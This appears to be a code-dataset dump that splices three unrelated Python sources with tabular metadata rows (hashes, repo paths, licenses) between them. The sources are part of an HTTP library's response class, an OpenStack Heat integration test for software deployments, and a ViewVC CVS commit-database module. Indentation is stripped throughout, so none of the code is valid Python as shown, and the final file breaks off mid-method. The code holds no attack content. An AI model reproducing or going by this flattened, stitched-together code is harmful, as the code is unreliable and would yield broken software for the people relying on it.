# If no Auth is explicitly provided, extract it from the URL first.
if auth is None:
url_auth = get_auth_from_url(self.url)
auth = url_auth if any(url_auth) else None
if auth:
if isinstance(auth, tuple) and len(auth) == 2:
# special-case basic HTTP auth
auth = HTTPBasicAuth(*auth)
# Allow auth to make its changes.
r = auth(self)
# Update self to reflect the auth changes.
self.__dict__.update(r.__dict__)
# Recompute Content-Length
self.prepare_content_length(self.body)
def prepare_cookies(self, cookies):
"""Prepares the given HTTP cookie data.
This function eventually generates a ``Cookie`` header from the
given cookies using cookielib. Due to cookielib's design, the header
will not be regenerated if it already exists, meaning this function
can only be called once for the life of the
:class:`PreparedRequest <PreparedRequest>` object. Any subsequent calls
to ``prepare_cookies`` will have no actual effect, unless the "Cookie"
header is removed beforehand.
"""
if isinstance(cookies, cookielib.CookieJar):
self._cookies = cookies
else:
self._cookies = cookiejar_from_dict(cookies)
cookie_header = get_cookie_header(self._cookies, self)
if cookie_header is not None:
self.headers['Cookie'] = cookie_header
def prepare_hooks(self, hooks):
"""Prepares the given hooks."""
# hooks can be passed as None to the prepare method and to this
# method. To prevent iterating over None, simply use an empty list
# if hooks is False-y
hooks = hooks or []
for event in hooks:
self.register_hook(event, hooks[event])
class Response(object):
"""The :class:`Response <Response>` object, which contains a
server's response to an HTTP request.
"""
__attrs__ = [
'_content', 'status_code', 'headers', 'url', 'history',
'encoding', 'reason', 'cookies', 'elapsed', 'request'
]
def __init__(self):
self._content = False
self._content_consumed = False
self._next = None
#: Integer Code of responded HTTP Status, e.g. 404 or 200.
self.status_code = None
#: Case-insensitive Dictionary of Response Headers.
#: For example, ``headers['content-encoding']`` will return the
#: value of a ``'Content-Encoding'`` response header.
self.headers = CaseInsensitiveDict()
#: File-like object representation of response (for advanced usage).
#: Use of ``raw`` requires that ``stream=True`` be set on the request.
# This requirement does not apply for use internally to Requests.
self.raw = None
#: Final URL location of Response.
self.url = None
#: Encoding to decode with when accessing r.text.
self.encoding = None
#: A list of :class:`Response <Response>` objects from
#: the history of the Request. Any redirect responses will end
#: up here. The list is sorted from the oldest to the most recent request.
self.history = []
#: Textual reason of responded HTTP Status, e.g. "Not Found" or "OK".
self.reason = None
#: A CookieJar of Cookies the server sent back.
self.cookies = cookiejar_from_dict({})
#: The amount of time elapsed between sending the request
#: and the arrival of the response (as a timedelta).
#: This property specifically measures the time taken between sending
#: the first byte of the request and finishing parsing the headers. It
#: is therefore unaffected by consuming the response content or the
#: value of the ``stream`` keyword argument.
self.elapsed = datetime.timedelta(0)
#: The :class:`PreparedRequest <PreparedRequest>` object to which this
#: is a response.
self.request = None
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def __getstate__(self):
# Consume everything; accessing the content attribute makes
# sure the content has been fully read.
if not self._content_consumed:
self.content
return dict(
(attr, getattr(self, attr, None))
for attr in self.__attrs__
)
def __setstate__(self, state):
for name, value in state.items():
setattr(self, name, value)
# pickled objects do not have .raw
setattr(self, '_content_consumed', True)
setattr(self, 'raw', None)
def __repr__(self):
return '<Response [%s]>' % (self.status_code)
def __bool__(self):
"""Returns True if :attr:`status_code` is less than 400.
This attribute checks if the status code of the response is between
400 and 600 to see if there was a client error or a server error. If
the status code, is between 200 and 400, this will return True. This
is **not** a check to see if the response code is ``200 OK``.
"""
return self.ok
def __nonzero__(self):
"""Returns True if :attr:`status_code` is less than 400.
This attribute checks if the status code of the response is between
400 and 600 to see if there was a client error or a server error. If
the status code, is between 200 and 400, this will return True. This
is **not** a check to see if the response code is ``200 OK``.
"""
return self.ok
def __iter__(self):
"""Allows you to use a response as an iterator."""
return self.iter_content(128)
@property
def ok(self):
"""Returns True if :attr:`status_code` is less than 400, False if not.
This attribute checks if the status code of the response is between
400 and 600 to see if there was a client error or a server error. If
the status code is between 200 and 400, this will return True. This
is **not** a check to see if the response code is ``200 OK``.
"""
try:
self.raise_for_status()
except HTTPError:
return False
return True
@property
def is_redirect(self):
"""True if this Response is a well-formed HTTP redirect that could have
been processed automatically (by :meth:`Session.resolve_redirects`).
"""
return ('location' in self.headers and self.status_code in REDIRECT_STATI)
@property
def is_permanent_redirect(self):
"""True if this Response one of the permanent versions of redirect."""
return ('location' in self.headers and self.status_code in (codes.moved_permanently, codes.permanent_redirect))
@property
def next(self):
"""Returns a PreparedRequest for the next request in a redirect chain, if there is one."""
return self._next
@property
def apparent_encoding(self):
"""The apparent encoding, provided by the chardet library."""
return chardet.detect(self.content)['encoding']
def iter_content(self, chunk_size=1, decode_unicode=False):
"""Iterates over the response data. When stream=True is set on the
request, this avoids reading the content at once into memory for
large responses. The chunk size is the number of bytes it should
read into memory. This is not necessarily the length of each item
returned as decoding can take place.
chunk_size must be of type int or None. A value of None will
function differently depending on the value of `stream`.
stream=True will read data as it arrives in whatever size the
chunks are received. If stream=False, data is returned as
a single chunk.
If decode_unicode is True, content will be decoded using the best
available encoding based on the response.
"""
def generate():
# Special case for urllib3.
if hasattr(self.raw, 'stream'):
try:
for chunk in self.raw.stream(chunk_size, decode_content=True):
yield chunk
except ProtocolError as e:
raise ChunkedEncodingError(e)
except DecodeError as e:
raise ContentDecodingError(e)
except ReadTimeoutError as e:
raise ConnectionError(e)
else:
# Standard file-like object.
while True:
chunk = self.raw.read(chunk_size)
if not chunk:
break
yield chunk
self._content_consumed = True
if self._content_consumed and isinstance(self._content, bool):
raise StreamConsumedError()
elif chunk_size is not None and not isinstance(chunk_size, int):
raise TypeError("chunk_size must be an int, it is instead a %s." % type(chunk_size))
# simulate reading small chunks of the content
reused_chunks = iter_slices(self._content, chunk_size)
stream_chunks = generate()
chunks = reused_chunks if self._content_consumed else stream_chunks
if decode_unicode:
chunks = stream_decode_response_unicode(chunks, self)
return chunks
def iter_lines(self, chunk_size=ITER_CHUNK_SIZE, decode_unicode=None, delimiter=None):
"""Iterates over the response data, one line at a time. When
stream=True is set on the request, this avoids reading the
content at once into memory for large responses.
.. note:: This method is not reentrant safe.
"""
pending = None
for chunk in self.iter_content(chunk_size=chunk_size, decode_unicode=decode_unicode):
if pending is not None:
chunk = pending + chunk
if delimiter:
lines = chunk.split(delimiter)
else:
lines = chunk.splitlines()
if lines and lines[-1] and chunk and lines[-1][-1] == chunk[-1]:
pending = lines.pop()
else:
pending = None
for line in lines:
yield line
if pending is not None:
yield pending
@property
def content(self):
"""Content of the response, in bytes."""
if self._content is False:
# Read the contents.
if self._content_consumed:
raise RuntimeError(
'The content for this response was already consumed')
if self.status_code == 0 or self.raw is None:
self._content = None
else:
self._content = b''.join(self.iter_content(CONTENT_CHUNK_SIZE)) or b''
self._content_consumed = True
# don't need to release the connection; that's been handled by urllib3
# since we exhausted the data.
return self._content
@property
def text(self):
"""Content of the response, in unicode.
If Response.encoding is None, encoding will be guessed using
``chardet``.
The encoding of the response content is determined based solely on HTTP
headers, following RFC 2616 to the letter. If you can take advantage of
non-HTTP knowledge to make a better guess at the encoding, you should
set ``r.encoding`` appropriately before accessing this property.
"""
# Try charset from content-type
content = None
encoding = self.encoding
if not self.content:
return str('')
# Fallback to auto-detected encoding.
if self.encoding is None:
encoding = self.apparent_encoding
# Decode unicode from given encoding.
try:
content = str(self.content, encoding, errors='replace')
except (LookupError, TypeError):
# A LookupError is raised if the encoding was not found which could
# indicate a misspelling or similar mistake.
#
# A TypeError can be raised if encoding is None
#
# So we try blindly encoding.
content = str(self.content, errors='replace')
return content
def json(self, **kwargs):
r"""Returns the json-encoded content of a response, if any.
:param \*\*kwargs: Optional arguments that ``json.loads`` takes.
:raises ValueError: If the response body does not contain valid json.
"""
if not self.encoding and self.content and len(self.content) > 3:
# No encoding set. JSON RFC 4627 section 3 states we should expect
# UTF-8, -16 or -32. Detect which one to use; If the detection or
# decoding fails, fall back to `self.text` (using chardet to make
# a best guess).
encoding = guess_json_utf(self.content)
if encoding is not None:
try:
return complexjson.loads(
self.content.decode(encoding), **kwargs
)
except UnicodeDecodeError:
# Wrong UTF codec detected; usually because it's not UTF-8
# but some other 8-bit codec. This is an RFC violation,
# and the server didn't bother to tell us what codec *was*
# used.
pass
return complexjson.loads(self.text, **kwargs)
@property
def links(self):
"""Returns the parsed header links of the response, if any."""
header = self.headers.get('link')
# l = MultiDict()
l = {}
if header:
links = parse_header_links(header)
for link in links:
key = link.get('rel') or link.get('url')
l[key] = link
return l
def raise_for_status(self):
"""Raises stored :class:`HTTPError`, if one occurred."""
http_error_msg = ''
if isinstance(self.reason, bytes):
# We attempt to decode utf-8 first because some servers
# choose to localize their reason strings. If the string
# isn't utf-8, we fall back to iso-8859-1 for all other
# encodings. (See PR #3538)
try:
reason = self.reason.decode('utf-8')
except UnicodeDecodeError:
reason = self.reason.decode('iso-8859-1')
else:
reason = self.reason
if 400 <= self.status_code < 500:
http_error_msg = u'%s Client Error: %s for url: %s' % (self.status_code, reason, self.url)
elif 500 <= self.status_code < 600:
http_error_msg = u'%s Server Error: %s for url: %s' % (self.status_code, reason, self.url)
if http_error_msg:
raise HTTPError(http_error_msg, response=self)
def close(self):
"""Releases the connection back to the pool. Once this method has been
called the underlying ``raw`` object must not be accessed again.
*Note: Should not normally need to be called explicitly.*
"""
if not self._content_consumed:
self.raw.close()
release_conn = getattr(self.raw, 'release_conn', None)
if release_conn is not None:
release_conn()
| 35.839454
| 119
| 0.59312
|
af7d671e295ab2a8935288375e10a9cc64e567dc
| 4,940
|
py
|
Python
|
heat_integrationtests/functional/test_software_config.py
|
maestro-hybrid-cloud/heat
|
91a4bb3170bd81b1c67a896706851e55709c9b5a
|
[
"Apache-2.0"
] | null | null | null |
heat_integrationtests/functional/test_software_config.py
|
maestro-hybrid-cloud/heat
|
91a4bb3170bd81b1c67a896706851e55709c9b5a
|
[
"Apache-2.0"
] | null | null | null |
heat_integrationtests/functional/test_software_config.py
|
maestro-hybrid-cloud/heat
|
91a4bb3170bd81b1c67a896706851e55709c9b5a
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import timeutils
import requests
import time
import yaml
from heat_integrationtests.common import exceptions
from heat_integrationtests.functional import functional_base
class ParallelDeploymentsTest(functional_base.FunctionalTestsBase):
server_template = '''
heat_template_version: "2013-05-23"
parameters:
flavor:
type: string
image:
type: string
network:
type: string
resources:
server:
type: OS::Nova::Server
properties:
image: {get_param: image}
flavor: {get_param: flavor}
user_data_format: SOFTWARE_CONFIG
networks: [{network: {get_param: network}}]
outputs:
server:
value: {get_resource: server}
'''
config_template = '''
heat_template_version: "2013-05-23"
parameters:
server:
type: string
resources:
config:
type: OS::Heat::SoftwareConfig
properties:
'''
deployment_snippet = '''
type: OS::Heat::SoftwareDeployments
properties:
config: {get_resource: config}
servers: {'0': {get_param: server}}
'''
enable_cleanup = True
def test_deployments_metadata(self):
parms = {'flavor': self.conf.minimal_instance_type,
'network': self.conf.fixed_network_name,
'image': self.conf.minimal_image_ref}
stack_identifier = self.stack_create(
parameters=parms,
template=self.server_template,
enable_cleanup=self.enable_cleanup)
server_stack = self.client.stacks.get(stack_identifier)
server = server_stack.outputs[0]['output_value']
config_stacks = []
# add up to 3 stacks each with up to 3 deployments
deploy_count = 0
deploy_count = self.deploy_many_configs(
stack_identifier,
server,
config_stacks,
2,
5,
deploy_count)
self.deploy_many_configs(
stack_identifier,
server,
config_stacks,
3,
3,
deploy_count)
self.signal_deployments(stack_identifier)
for config_stack in config_stacks:
self._wait_for_stack_status(config_stack, 'CREATE_COMPLETE')
def deploy_many_configs(self, stack, server, config_stacks,
stack_count, deploys_per_stack,
deploy_count_start):
for a in range(stack_count):
config_stacks.append(
self.deploy_config(server, deploys_per_stack))
new_count = deploy_count_start + stack_count * deploys_per_stack
self.wait_for_deploy_metadata_set(stack, new_count)
return new_count
def deploy_config(self, server, deploy_count):
parms = {'server': server}
template = yaml.safe_load(self.config_template)
resources = template['resources']
resources['config']['properties'] = {'config': 'x' * 10000}
for a in range(deploy_count):
resources['dep_%s' % a] = yaml.safe_load(self.deployment_snippet)
return self.stack_create(
parameters=parms,
template=template,
enable_cleanup=self.enable_cleanup,
expected_status=None)
def wait_for_deploy_metadata_set(self, stack, deploy_count):
build_timeout = self.conf.build_timeout
build_interval = self.conf.build_interval
start = timeutils.utcnow()
while timeutils.delta_seconds(start,
timeutils.utcnow()) < build_timeout:
server_metadata = self.client.resources.metadata(
stack, 'server')
if len(server_metadata['deployments']) == deploy_count:
return
time.sleep(build_interval)
message = ('Deployment resources failed to be created within '
'the required time (%s s).' %
(build_timeout))
raise exceptions.TimeoutException(message)
def signal_deployments(self, stack_identifier):
server_metadata = self.client.resources.metadata(
stack_identifier, 'server')
for dep in server_metadata['deployments']:
iv = dict((i['name'], i['value']) for i in dep['inputs'])
sigurl = iv.get('deploy_signal_id')
requests.post(sigurl, data='{}',
headers={'content-type': None})
| 33.378378
| 78
| 0.637045
|
606f6e8d8255af7dd2d10cd0f1a51655719e2c7a
| 31,751
|
py
|
Python
|
lib/cvsdb.py
|
infamous19/viewvc
|
b54b7f9cd64b25ff5d95389fe15d510600218f22
|
[
"BSD-2-Clause"
] | null | null | null |
lib/cvsdb.py
|
infamous19/viewvc
|
b54b7f9cd64b25ff5d95389fe15d510600218f22
|
[
"BSD-2-Clause"
] | null | null | null |
lib/cvsdb.py
|
infamous19/viewvc
|
b54b7f9cd64b25ff5d95389fe15d510600218f22
|
[
"BSD-2-Clause"
] | null | null | null |
# -*-python-*-
#
# Copyright (C) 1999-2020 The ViewCVS Group. All Rights Reserved.
#
# By using this file, you agree to the terms and conditions set forth in
# the LICENSE.html file which can be found at the top level of the ViewVC
# distribution or at http://viewvc.org/license-1.html.
#
# For more information, visit http://viewvc.org/
#
# -----------------------------------------------------------------------
import os
import sys
import time
import fnmatch
import re
import vclib
import dbi
## Current commits database schema version number.
##
## Version 0 was the original Bonsai-compatible version.
##
## Version 1 added the 'metadata' table (which holds the 'version' key)
## and renamed all the 'repository'-related stuff to be 'root'-
##
CURRENT_SCHEMA_VERSION = 1
## error
error = "cvsdb error"
## CheckinDatabase provides all interfaces needed to the SQL database
## back-end; it needs to be subclassed, and have its "Connect" method
## defined to actually be complete; it should run well off of any DBI 2.0
## complient database interface
class CheckinDatabase:
def __init__(self, host, port, user, passwd, database):
self._host = host
self._port = port
self._user = user
self._passwd = passwd
self._database = database
self._version = None
## database lookup caches
self._get_cache = {}
self._get_id_cache = {}
self._desc_id_cache = {}
def Connect(self):
self.db = dbi.connect(
self._host, self._port, self._user, self._passwd, self._database)
cursor = self.db.cursor()
cursor.execute("SET AUTOCOMMIT=1")
table_list = self.GetTableList()
if 'metadata' in table_list:
version = self.GetMetadataValue("version")
if version is None:
self._version = 0
else:
self._version = int(version)
else:
self._version = 0
if self._version > CURRENT_SCHEMA_VERSION:
raise DatabaseVersionError("Database version %d is newer than the "
"last version supported by this "
"software." % (self._version))
def sql_get_id(self, table, column, value, auto_set):
sql = "SELECT id FROM %s WHERE %s=%%s" % (table, column)
sql_args = (value, )
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
try:
(id, ) = cursor.fetchone()
except TypeError:
if not auto_set:
return None
else:
return str(int(id))
## insert the new identifier
sql = "INSERT INTO %s(%s) VALUES(%%s)" % (table, column)
sql_args = (value, )
cursor.execute(sql, sql_args)
return self.sql_get_id(table, column, value, 0)
def get_id(self, table, column, value, auto_set):
## attempt to retrieve from cache
try:
return self._get_id_cache[table][column][value]
except KeyError:
pass
id = self.sql_get_id(table, column, value, auto_set)
if id == None:
return None
## add to cache
try:
temp = self._get_id_cache[table]
except KeyError:
temp = self._get_id_cache[table] = {}
try:
temp2 = temp[column]
except KeyError:
temp2 = temp[column] = {}
temp2[value] = id
return id
def sql_get(self, table, column, id):
sql = "SELECT %s FROM %s WHERE id=%%s" % (column, table)
sql_args = (id, )
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
try:
(value, ) = cursor.fetchone()
except TypeError:
return None
return value
def get(self, table, column, id):
## attempt to retrieve from cache
try:
return self._get_cache[table][column][id]
except KeyError:
pass
value = self.sql_get(table, column, id)
if value == None:
return None
## add to cache
try:
temp = self._get_cache[table]
except KeyError:
temp = self._get_cache[table] = {}
try:
temp2 = temp[column]
except KeyError:
temp2 = temp[column] = {}
temp2[id] = value
return value
def get_list(self, table, field_index):
sql = "SELECT * FROM %s" % (table)
cursor = self.db.cursor()
cursor.execute(sql)
list = []
while 1:
row = cursor.fetchone()
if row == None:
break
list.append(row[field_index])
return list
def GetCommitsTable(self):
return self._version >= 1 and 'commits' or 'checkins'
def GetTableList(self):
sql = "SHOW TABLES"
cursor = self.db.cursor()
cursor.execute(sql)
list = []
while 1:
row = cursor.fetchone()
if row == None:
break
list.append(row[0])
return list
def GetMetadataValue(self, name):
sql = "SELECT value FROM metadata WHERE name=%s"
sql_args = (name, )
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
try:
(value,) = cursor.fetchone()
except TypeError:
return None
return value
def SetMetadataValue(self, name, value):
assert(self._version > 0)
sql = "REPLACE INTO metadata (name, value) VALUES (%s, %s)"
sql_args = (name, value)
cursor = self.db.cursor()
try:
cursor.execute(sql, sql_args)
except Exception, e:
raise Exception("Error setting metadata: '%s'\n"
"\tname = %s\n"
"\tvalue = %s\n"
% (str(e), name, value))
def GetBranchID(self, branch, auto_set = 1):
return self.get_id("branches", "branch", branch, auto_set)
def GetBranch(self, id):
return self.get("branches", "branch", id)
def GetDirectoryID(self, dir, auto_set = 1):
return self.get_id("dirs", "dir", dir, auto_set)
def GetDirectory(self, id):
return self.get("dirs", "dir", id)
def GetFileID(self, file, auto_set = 1):
return self.get_id("files", "file", file, auto_set)
def GetFile(self, id):
return self.get("files", "file", id)
def GetAuthorID(self, author, auto_set = 1):
return self.get_id("people", "who", author, auto_set)
def GetAuthor(self, id):
return self.get("people", "who", id)
def GetRepositoryID(self, repository, auto_set = 1):
return self.get_id("repositories", "repository", repository, auto_set)
def GetRepository(self, id):
return self.get("repositories", "repository", id)
def SQLGetDescriptionID(self, description, auto_set = 1):
## lame string hash, blame Netscape -JMP
hash = len(description)
sql = "SELECT id FROM descs WHERE hash=%s AND description=%s"
sql_args = (hash, description)
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
try:
(id, ) = cursor.fetchone()
except TypeError:
if not auto_set:
return None
else:
return str(int(id))
sql = "INSERT INTO descs (hash,description) values (%s,%s)"
sql_args = (hash, description)
cursor.execute(sql, sql_args)
return self.GetDescriptionID(description, 0)
def GetDescriptionID(self, description, auto_set = 1):
## attempt to retrieve from cache
hash = len(description)
try:
return self._desc_id_cache[hash][description]
except KeyError:
pass
id = self.SQLGetDescriptionID(description, auto_set)
if id == None:
return None
## add to cache
try:
temp = self._desc_id_cache[hash]
except KeyError:
temp = self._desc_id_cache[hash] = {}
temp[description] = id
return id
def GetDescription(self, id):
return self.get("descs", "description", id)
def GetRepositoryList(self):
return self.get_list("repositories", 1)
def GetBranchList(self):
return self.get_list("branches", 1)
def GetAuthorList(self):
return self.get_list("people", 1)
def AddCommitList(self, commit_list):
for commit in commit_list:
self.AddCommit(commit)
def AddCommit(self, commit):
ci_when = dbi.DateTimeFromTicks(commit.GetTime() or 0.0)
ci_type = commit.GetTypeString()
who_id = self.GetAuthorID(commit.GetAuthor())
repository_id = self.GetRepositoryID(commit.GetRepository())
directory_id = self.GetDirectoryID(commit.GetDirectory())
file_id = self.GetFileID(commit.GetFile())
revision = commit.GetRevision()
sticky_tag = "NULL"
branch_id = self.GetBranchID(commit.GetBranch())
plus_count = commit.GetPlusCount() or '0'
minus_count = commit.GetMinusCount() or '0'
description_id = self.GetDescriptionID(commit.GetDescription())
sql = "REPLACE INTO %s" % (self.GetCommitsTable())
sql = sql + \
" (type,ci_when,whoid,repositoryid,dirid,fileid,revision,"\
" stickytag,branchid,addedlines,removedlines,descid)"\
"VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)"
sql_args = (ci_type, ci_when, who_id, repository_id,
directory_id, file_id, revision, sticky_tag, branch_id,
plus_count, minus_count, description_id)
cursor = self.db.cursor()
try:
cursor.execute(sql, sql_args)
except Exception, e:
raise Exception("Error adding commit: '%s'\n"
"Values were:\n"
"\ttype = %s\n"
"\tci_when = %s\n"
"\twhoid = %s\n"
"\trepositoryid = %s\n"
"\tdirid = %s\n"
"\tfileid = %s\n"
"\trevision = %s\n"
"\tstickytag = %s\n"
"\tbranchid = %s\n"
"\taddedlines = %s\n"
"\tremovedlines = %s\n"
"\tdescid = %s\n"
% ((str(e), ) + sql_args))
def SQLQueryListString(self, field, query_entry_list):
sqlList = []
for query_entry in query_entry_list:
data = query_entry.data
## figure out the correct match type
if query_entry.match == "exact":
match = "="
elif query_entry.match == "like":
match = " LIKE "
elif query_entry.match == "glob":
match = " REGEXP "
# Use fnmatch to translate the glob into a regular
# expression. Sadly, we have to account for the fact
# that in Python 2.6, fnmatch.translate() started
# sticking '\Z(?ms)' at the end of the regular
# expression instead of just '$', and doesn't prepend
# the '^'.
data = fnmatch.translate(data)
if data[0] != '^':
data = '^' + data
if data[-7:] == '\Z(?ms)':
data = data[:-7] + '$'
elif query_entry.match == "regex":
match = " REGEXP "
elif query_entry.match == "notregex":
match = " NOT REGEXP "
sqlList.append("%s%s%s" % (field, match, self.db.literal(data)))
return "(%s)" % (" OR ".join(sqlList))
def CreateSQLQueryString(self, query, detect_leftover=0):
commits_table = self.GetCommitsTable()
tableList = [(commits_table, None)]
condList = []
if len(query.repository_list):
tableList.append(("repositories",
"(%s.repositoryid=repositories.id)"
% (commits_table)))
temp = self.SQLQueryListString("repositories.repository",
query.repository_list)
condList.append(temp)
if len(query.branch_list):
tableList.append(("branches",
"(%s.branchid=branches.id)" % (commits_table)))
temp = self.SQLQueryListString("branches.branch",
query.branch_list)
condList.append(temp)
if len(query.directory_list):
tableList.append(("dirs",
"(%s.dirid=dirs.id)" % (commits_table)))
temp = self.SQLQueryListString("dirs.dir", query.directory_list)
condList.append(temp)
if len(query.file_list):
tableList.append(("files",
"(%s.fileid=files.id)" % (commits_table)))
temp = self.SQLQueryListString("files.file", query.file_list)
condList.append(temp)
if len(query.author_list):
tableList.append(("people",
"(%s.whoid=people.id)" % (commits_table)))
temp = self.SQLQueryListString("people.who", query.author_list)
condList.append(temp)
if len(query.comment_list):
tableList.append(("descs",
"(%s.descid=descs.id)" % (commits_table)))
temp = self.SQLQueryListString("descs.description",
query.comment_list)
condList.append(temp)
if query.from_date:
temp = "(%s.ci_when>=\"%s\")" \
% (commits_table, str(query.from_date))
condList.append(temp)
if query.to_date:
temp = "(%s.ci_when<=\"%s\")" \
% (commits_table, str(query.to_date))
condList.append(temp)
if query.sort == "date":
order_by = "ORDER BY %s.ci_when DESC,descid" % (commits_table)
elif query.sort == "author":
tableList.append(("people",
"(%s.whoid=people.id)" % (commits_table)))
order_by = "ORDER BY people.who,descid"
elif query.sort == "file":
tableList.append(("files",
"(%s.fileid=files.id)" % (commits_table)))
order_by = "ORDER BY files.file,descid"
## exclude duplicates from the table list, and split out join
## conditions from table names. In future, the join conditions
## might be handled by INNER JOIN statements instead of WHERE
## clauses, but MySQL 3.22 apparently doesn't support them well.
tables = []
joinConds = []
for (table, cond) in tableList:
if table not in tables:
tables.append(table)
if cond is not None: joinConds.append(cond)
tables = ",".join(tables)
conditions = " AND ".join(joinConds + condList)
conditions = conditions and "WHERE %s" % conditions
## apply the query's row limit, if any (so we avoid really
## slamming a server with a large database)
limit = ""
if query.limit:
if detect_leftover:
limit = "LIMIT %s" % (str(query.limit + 1))
else:
limit = "LIMIT %s" % (str(query.limit))
sql = "SELECT %s.* FROM %s %s %s %s" \
% (commits_table, tables, conditions, order_by, limit)
return sql
def RunQuery(self, query):
sql = self.CreateSQLQueryString(query, 1)
cursor = self.db.cursor()
cursor.execute(sql)
query.SetExecuted()
row_count = 0
while 1:
row = cursor.fetchone()
if not row:
break
row_count = row_count + 1
if query.limit and (row_count > query.limit):
query.SetLimitReached()
break
(dbType, dbCI_When, dbAuthorID, dbRepositoryID, dbDirID,
dbFileID, dbRevision, dbStickyTag, dbBranchID, dbAddedLines,
dbRemovedLines, dbDescID) = row
commit = LazyCommit(self)
if dbType == 'Add':
commit.SetTypeAdd()
elif dbType == 'Remove':
commit.SetTypeRemove()
else:
commit.SetTypeChange()
commit.SetTime(dbi.TicksFromDateTime(dbCI_When))
commit.SetFileID(dbFileID)
commit.SetDirectoryID(dbDirID)
commit.SetRevision(dbRevision)
commit.SetRepositoryID(dbRepositoryID)
commit.SetAuthorID(dbAuthorID)
commit.SetBranchID(dbBranchID)
commit.SetPlusCount(dbAddedLines)
commit.SetMinusCount(dbRemovedLines)
commit.SetDescriptionID(dbDescID)
query.AddCommit(commit)
def CheckCommit(self, commit):
repository_id = self.GetRepositoryID(commit.GetRepository(), 0)
if repository_id == None:
return None
dir_id = self.GetDirectoryID(commit.GetDirectory(), 0)
if dir_id == None:
return None
file_id = self.GetFileID(commit.GetFile(), 0)
if file_id == None:
return None
sql = "SELECT type, ci_when, whoid, repositoryid, dirid, fileid, " \
"revision, stickytag, branchid, addedlines, removedlines, " \
"descid "\
" FROM %s WHERE "\
" repositoryid=%%s "\
" AND dirid=%%s"\
" AND fileid=%%s"\
" AND revision=%%s"\
% (self.GetCommitsTable())
sql_args = (repository_id, dir_id, file_id, commit.GetRevision())
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
try:
(ci_type, ci_when, who_id, repository_id,
dir_id, file_id, revision, sticky_tag, branch_id,
plus_count, minus_count, description_id) = cursor.fetchone()
except TypeError:
return None
return commit
def sql_delete(self, table, key, value, keep_fkey = None):
sql = "DELETE FROM %s WHERE %s=%%s" % (table, key)
sql_args = (value, )
if keep_fkey:
sql += " AND %s NOT IN (SELECT %s FROM %s WHERE %s = %%s)" \
% (key, keep_fkey, self.GetCommitsTable(), keep_fkey)
sql_args = (value, value)
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
def sql_purge(self, table, key, fkey, ftable):
sql = "DELETE FROM %s WHERE %s NOT IN (SELECT %s FROM %s)" \
% (table, key, fkey, ftable)
cursor = self.db.cursor()
cursor.execute(sql)
def PurgeRepository(self, repository):
rep_id = self.GetRepositoryID(repository, auto_set=0)
if not rep_id:
raise UnknownRepositoryError("Unknown repository '%s'"
% (repository))
if (self._version >= 1):
self.sql_delete('repositories', 'id', rep_id)
self.sql_purge('commits', 'repositoryid', 'id', 'repositories')
self.sql_purge('files', 'id', 'fileid', 'commits')
self.sql_purge('dirs', 'id', 'dirid', 'commits')
self.sql_purge('branches', 'id', 'branchid', 'commits')
self.sql_purge('descs', 'id', 'descid', 'commits')
self.sql_purge('people', 'id', 'whoid', 'commits')
else:
sql = "SELECT type, ci_when, whoid, repositoryid, dirid, " \
"fileid, revision, stickytag, branchid, addedlines, " \
"removedlines, descid "\
" FROM checkins WHERE repositoryid=%s"
sql_args = (rep_id, )
cursor = self.db.cursor()
cursor.execute(sql, sql_args)
checkins = []
while 1:
try:
(ci_type, ci_when, who_id, repository_id,
dir_id, file_id, revision, sticky_tag, branch_id,
plus_count, minus_count, description_id) = \
cursor.fetchone()
except TypeError:
break
checkins.append([file_id, dir_id, branch_id,
description_id, who_id])
#self.sql_delete('repositories', 'id', rep_id)
self.sql_delete('checkins', 'repositoryid', rep_id)
for checkin in checkins:
self.sql_delete('files', 'id', checkin[0], 'fileid')
self.sql_delete('dirs', 'id', checkin[1], 'dirid')
self.sql_delete('branches', 'id', checkin[2], 'branchid')
self.sql_delete('descs', 'id', checkin[3], 'descid')
self.sql_delete('people', 'id', checkin[4], 'whoid')
# Reset all internal id caches. We could be choosier here,
# but let's just be as safe as possible.
self._get_cache = {}
self._get_id_cache = {}
self._desc_id_cache = {}
class DatabaseVersionError(Exception):
pass
class UnknownRepositoryError(Exception):
pass
## the Commit class holds data on one commit, the representation is as
## close as possible to how it should be committed and retrieved to the
## database engine
class Commit:
## static constants for type of commit
CHANGE = 0
ADD = 1
REMOVE = 2
def __init__(self):
self.__directory = ''
self.__file = ''
self.__repository = ''
self.__revision = ''
self.__author = ''
self.__branch = ''
self.__pluscount = ''
self.__minuscount = ''
self.__description = ''
self.__gmt_time = 0.0
self.__type = Commit.CHANGE
def SetRepository(self, repository):
self.__repository = repository
def GetRepository(self):
return self.__repository
def SetDirectory(self, dir):
self.__directory = dir
def GetDirectory(self):
return self.__directory
def SetFile(self, file):
self.__file = file
def GetFile(self):
return self.__file
def SetRevision(self, revision):
self.__revision = revision
def GetRevision(self):
return self.__revision
def SetTime(self, gmt_time):
if gmt_time is None:
### We're just going to assume that a datestamp of The Epoch
### ain't real.
self.__gmt_time = 0.0
else:
self.__gmt_time = float(gmt_time)
def GetTime(self):
return self.__gmt_time and self.__gmt_time or None
def SetAuthor(self, author):
self.__author = author
def GetAuthor(self):
return self.__author
def SetBranch(self, branch):
self.__branch = branch or ''
def GetBranch(self):
return self.__branch
def SetPlusCount(self, pluscount):
self.__pluscount = pluscount
def GetPlusCount(self):
return self.__pluscount
def SetMinusCount(self, minuscount):
self.__minuscount = minuscount
def GetMinusCount(self):
return self.__minuscount
def SetDescription(self, description):
self.__description = description
def GetDescription(self):
return self.__description
def SetTypeChange(self):
self.__type = Commit.CHANGE
def SetTypeAdd(self):
self.__type = Commit.ADD
def SetTypeRemove(self):
self.__type = Commit.REMOVE
def GetType(self):
return self.__type
def GetTypeString(self):
if self.__type == Commit.CHANGE:
return 'Change'
